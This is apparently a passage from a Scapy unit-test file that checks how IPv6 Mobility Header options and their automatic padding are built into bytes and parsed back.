IPv6ExtHdrRouting - type 2 - hashret + +p = IPv6()/IPv6ExtHdrRouting(addresses=["2001:db8::1", "2001:db8::2"])/ICMPv6EchoRequest() +p.hashret() == b" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x00\x00\x00\x00" + + +############ +############ ++ Mobility Options - Binding Refresh Advice + += MIP6OptBRAdvice - build (default values) +s = b'\x02\x02\x00\x00' +raw(MIP6OptBRAdvice()) == s + += MIP6OptBRAdvice - dissection (default values) +p = MIP6OptBRAdvice(s) +p.otype == 2 and p.olen == 2 and p.rinter == 0 + += MIP6OptBRAdvice - build +s = b'\x03*\n\xf7' +raw(MIP6OptBRAdvice(otype=3, olen=42, rinter=2807)) == s + += MIP6OptBRAdvice - dissection +p = MIP6OptBRAdvice(s) +p.otype == 3 and p.olen == 42 and p.rinter == 2807 + + +############ +############ ++ Mobility Options - Alternate Care-of Address + += MIP6OptAltCoA - build (default values) +s = b'\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(MIP6OptAltCoA()) == s + += MIP6OptAltCoA - dissection (default values) +p = MIP6OptAltCoA(s) +p.otype == 3 and p.olen == 16 and p.acoa == '::' + += MIP6OptAltCoA - build +s = b'*\x08 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +raw(MIP6OptAltCoA(otype=42, olen=8, acoa='2001:db8::1')) == s + += MIP6OptAltCoA - dissection +p = MIP6OptAltCoA(s) +p.otype == 42 and p.olen == 8 and p.acoa == '2001:db8::1' + + +############ +############ ++ Mobility Options - Nonce Indices + += MIP6OptNonceIndices - build (default values) +s = b'\x04\x10\x00\x00\x00\x00' +raw(MIP6OptNonceIndices()) == s + += MIP6OptNonceIndices - dissection (default values) +p = MIP6OptNonceIndices(s) +p.otype == 4 and p.olen == 16 and p.hni == 0 and p.coni == 0 + += MIP6OptNonceIndices - build +s = b'\x04\x12\x00\x13\x00\x14' +raw(MIP6OptNonceIndices(olen=18, hni=19, coni=20)) == s + += MIP6OptNonceIndices - dissection +p = MIP6OptNonceIndices(s) +p.hni == 19 and p.coni == 20 + + +############ +############ ++ Mobility Options - Binding Authentication Data + += MIP6OptBindingAuthData - build (default values) +s = b'\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(MIP6OptBindingAuthData()) == s + += MIP6OptBindingAuthData - dissection (default values) +p = MIP6OptBindingAuthData(s) +p.otype == 5 and p.olen == 16 and p.authenticator == 0 + += MIP6OptBindingAuthData - build +s = b'\x05*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xf7' +raw(MIP6OptBindingAuthData(olen=42, authenticator=2807)) == s + += MIP6OptBindingAuthData - dissection +p = MIP6OptBindingAuthData(s) +p.otype == 5 and p.olen == 42 and p.authenticator == 2807 + + +############ +############ ++ Mobility Options - Mobile Network Prefix + += MIP6OptMobNetPrefix - build (default values) +s = b'\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(MIP6OptMobNetPrefix()) == s + += MIP6OptMobNetPrefix - dissection (default values) +p = MIP6OptMobNetPrefix(s) +p.otype == 6 and p.olen == 18 and p.plen == 64 and p.prefix == '::' + += MIP6OptMobNetPrefix - build +s = b'\x06*\x02 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(MIP6OptMobNetPrefix(olen=42, reserved=2, plen=32, prefix='2001:db8::')) == s + += MIP6OptMobNetPrefix - dissection +p = MIP6OptMobNetPrefix(s) +p.olen == 42 and p.reserved == 2 and p.plen == 32 and p.prefix == '2001:db8::' + + +############ +############ ++ Mobility Options - Link-Layer Address (MH-LLA) + += MIP6OptLLAddr - basic build +raw(MIP6OptLLAddr()) == b'\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00' + += MIP6OptLLAddr - basic dissection +p = MIP6OptLLAddr(b'\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00') +p.otype == 7 and p.olen == 7 and p.ocode == 2 and p.pad == 0 and p.lla == "00:00:00:00:00:00" + += MIP6OptLLAddr - build with specific values +raw(MIP6OptLLAddr(olen=42, ocode=4, pad=0xff, lla='EE:EE:EE:EE:EE:EE')) == b'\x07*\x04\xff\xee\xee\xee\xee\xee\xee' + += MIP6OptLLAddr - dissection with specific values +p = MIP6OptLLAddr(b'\x07*\x04\xff\xee\xee\xee\xee\xee\xee') + +raw(MIP6OptLLAddr(olen=42, ocode=4, pad=0xff, lla='EE:EE:EE:EE:EE:EE')) +p.otype == 7 and p.olen == 42 and p.ocode == 4 and p.pad == 0xff and p.lla == "ee:ee:ee:ee:ee:ee" + + +############ +############ ++ Mobility Options - Mobile Node Identifier + += MIP6OptMNID - basic build +raw(MIP6OptMNID()) == b'\x08\x01\x01' + += MIP6OptMNID - basic dissection +p = MIP6OptMNID(b'\x08\x01\x01') +p.otype == 8 and p.olen == 1 and p.subtype == 1 and p.id == b"" + += MIP6OptMNID - build with specific values +raw(MIP6OptMNID(subtype=42, id="someid")) == b'\x08\x07*someid' + += MIP6OptMNID - dissection with specific values +p = MIP6OptMNID(b'\x08\x07*someid') +p.otype == 8 and p.olen == 7 and p.subtype == 42 and p.id == b"someid" + + + +############ +############ ++ Mobility Options - Message Authentication + += MIP6OptMsgAuth - basic build +raw(MIP6OptMsgAuth()) == b'\x09\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' + += MIP6OptMsgAuth - basic dissection +p = MIP6OptMsgAuth(b'\x09\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA') +p.otype == 9 and p.olen == 17 and p.subtype == 1 and p.mspi == 0 and p.authdata == b"A"*12 + += MIP6OptMsgAuth - build with specific values +raw(MIP6OptMsgAuth(authdata="B"*16, mspi=0xeeeeeeee, subtype=0xff)) == b'\t\x15\xff\xee\xee\xee\xeeBBBBBBBBBBBBBBBB' + += MIP6OptMsgAuth - dissection with specific values +p = MIP6OptMsgAuth(b'\t\x15\xff\xee\xee\xee\xeeBBBBBBBBBBBBBBBB') +p.otype == 9 and p.olen == 21 and p.subtype == 255 and p.mspi == 0xeeeeeeee and p.authdata == b"B"*16 + + +############ +############ ++ Mobility Options - Replay Protection + += MIP6OptReplayProtection - basic build +raw(MIP6OptReplayProtection()) == b'\n\x08\x00\x00\x00\x00\x00\x00\x00\x00' + += MIP6OptReplayProtection - basic dissection +p = MIP6OptReplayProtection(b'\n\x08\x00\x00\x00\x00\x00\x00\x00\x00') +p.otype == 10 and p.olen == 8 and p.timestamp == 0 + += MIP6OptReplayProtection - build with specific values +s = raw(MIP6OptReplayProtection(olen=42, timestamp=(72*31536000)<<32)) +s == b'\n*\x87V|\x00\x00\x00\x00\x00' + += MIP6OptReplayProtection - dissection with specific values +p = MIP6OptReplayProtection(s) +p.otype == 10 and p.olen == 42 and p.timestamp == 9752118382559232000 +p.fields_desc[-1].i2repr("", p.timestamp) == 'Mon, 13 Dec 1971 23:50:39 +0000 (9752118382559232000)' + + +############ +############ ++ Mobility Options - CGA Parameters += MIP6OptCGAParams + + +############ +############ ++ Mobility Options - Signature += MIP6OptSignature + + +############ +############ ++ Mobility Options - Permanent Home Keygen Token += MIP6OptHomeKeygenToken + + +############ +############ ++ Mobility Options - Care-of Test Init += MIP6OptCareOfTestInit + + +############ +############ ++ Mobility Options - Care-of Test += MIP6OptCareOfTest + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptBRAdvice += Mobility Options - Automatic Padding - MIP6OptBRAdvice +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptBRAdvice()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x02\x02\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x02\x02\x00\x00\x01\x04\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x02\x02\x00\x00\x01\x04\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x00\x02\x02\x00\x00\x01\x02\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x02\x02\x00\x00\x01\x02\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x02\x02\x00\x00\x01\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x02\x02\x00\x00\x01\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptBRAdvice()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00' +a and b and c and d and e and g and h and i and j + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptAltCoA += Mobility Options - Automatic Padding - MIP6OptAltCoA +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptAltCoA()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x05\x00\x00\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x04\x00\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x01\x03\x00\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x02\x00\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptAltCoA()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptNonceIndices += Mobility Options - Automatic Padding - MIP6OptNonceIndices +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x00\x04\x10\x00\x00\x00\x00\x01\x02\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x04\x10\x00\x00\x00\x00\x01\x02\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x00\x04\x10\x00\x00\x00\x00\x01\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x04\x10\x00\x00\x00\x00\x01\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptNonceIndices()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptNonceIndices()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptNonceIndices()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptBindingAuthData += Mobility Options - Automatic Padding - MIP6OptBindingAuthData +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x03\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x02\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x01\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptBindingAuthData()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptBindingAuthData()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptBindingAuthData()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\x05\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptMobNetPrefix += Mobility Options - Automatic Padding - MIP6OptMobNetPrefix +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMobNetPrefix()])) == b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x01\x05\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x04\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x03\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x01\x02\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x01\x01\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMobNetPrefix()])) == b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptLLAddr += Mobility Options - Automatic Padding - MIP6OptLLAddr +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x00' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptLLAddr()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptLLAddr()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x07\x07\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptMNID += Mobility Options - Automatic Padding - MIP6OptMNID +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMNID()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x08\x01\x01\x00' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMNID()])) ==b';\x01\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\x08\x01\x01' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x08\x01\x01\x01\x05\x00\x00\x00\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x08\x01\x01\x01\x04\x00\x00\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x08\x01\x01\x01\x03\x00\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\x08\x01\x01\x01\x02\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x08\x01\x01\x01\x01\x00' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x08\x01\x01\x01\x00' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMNID()])) ==b';\x02\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x08\x01\x01\x00' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptMsgAuth += Mobility Options - Automatic Padding - MIP6OptMsgAuth +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptMsgAuth()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' +b = raw(MIP6MH_BU(seq=0x4242, options=[Pad1(),MIP6OptMsgAuth()])) ==b';\x03\x05\x00\x00\x00BB\xd0\x00\x00\x03\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' +c = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*0),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x00\x01\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' +d = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*1),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x01\x00\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' +e = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*2),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x02\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' +g = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*3),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x03\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA\x01\x02\x00\x00' +h = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*4),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x04\x00\x00\x00\x00\x01\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' +i = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*5),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x05\x00\x00\x00\x00\x00\x01\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' +j = raw(MIP6MH_BU(seq=0x4242, options=[PadN(optdata=b'\x00'*6),MIP6OptMsgAuth()])) ==b';\x04\x05\x00\x00\x00BB\xd0\x00\x00\x03\x01\x06\x00\x00\x00\x00\x00\x00\x00\t\x11\x01\x00\x00\x00\x00AAAAAAAAAAAA' +a and b and c and d and e and g and h and i and j + + +############ +############ ++ Mobility Options - Automatic Padding - MIP6OptReplayProtection += Mobility Options - Automatic Padding - MIP6OptReplayProtection +a = raw(MIP6MH_BU(seq=0x4242, options=[MIP6OptReplayProtection()])) 